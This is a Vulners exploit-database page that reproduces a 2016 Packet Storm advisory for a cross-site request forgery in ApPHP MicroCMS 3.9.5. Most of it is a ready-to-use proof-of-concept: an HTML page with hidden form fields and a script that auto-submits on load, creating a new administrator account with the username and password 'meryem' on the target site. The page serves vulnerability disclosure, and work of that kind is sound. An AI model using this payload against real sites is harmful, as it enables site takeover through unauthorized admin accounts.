Lucene search
+L

ApPHP MicroCMS 3.9.5 Cross Site Request Forgery

🗓️ 13 Oct 2016 00:00:00Reported by BesimType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

ApPHP MicroCMS 3.9.5 Cross Site Request Forgery allows unauthorized admin creatio

Code
`# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin (Main))  
# Author :------------------------ : Besim  
# Google Dork :---------------- : -  
# Date :-------------------------- : 12/10/2016  
# Type :-------------------------- : webapps  
# Platform : -------------------- : PHP   
# Vendor Homepage :------- : http://www.apphp.com  
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products  
  
*-* Vulnerable link : http://site_name/path/index.php?admin=admins_management  
  
  
############ CSRF PoC #############  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<form action="http://site_name/path/index.php?admin=admins_management" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="mg_prefix" value=" " />  
<input type="hidden" name="mg_action" value="create" />  
<input type="hidden" name="mg_rid" value="-1" />  
<input type="hidden" name="mg_sorting_fields" value=" " />  
<input type="hidden" name="mg_sorting_types" value=" " />  
<input type="hidden" name="mg_page" value="1" />  
<input type="hidden" name="mg_operation" value=" " />  
<input type="hidden" name="mg_operation_type" value=" " />  
<input type="hidden" name="mg_operation_field" value=" " />  
<input type="hidden" name="mg_search_status" value=" " />  
<input type="hidden" name="mg_language_id" value=" " />  
<input type="hidden" name="mg_operation_code" value="yh0ox75feagwqbccp8ef" />  
<input type="hidden" name="token" value="dbe0e51cf3a5ce407336a94f52043157" />  
<input type="hidden" name="date_lastlogin" value=" " />  
<input type="hidden" name="date_created" value="2016-10-12 21:14:06" />  
<input type="hidden" name="first_name" value="meryem" />  
<input type="hidden" name="last_name" value="ak" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="user_name" value="meryem" />  
<input type="hidden" name="password" value="meryem" />  
<input type="hidden" name="account_type" value="admin" />  
<input type="hidden" name="preferred_language" value="en" />  
<input type="hidden" name="is_active" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
############ ########## ############  
  
  
*-* Thanks Meryem AKDOAAN *-*  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2016 00:00Current
0.9Low risk
Vulners AI Score0.9
27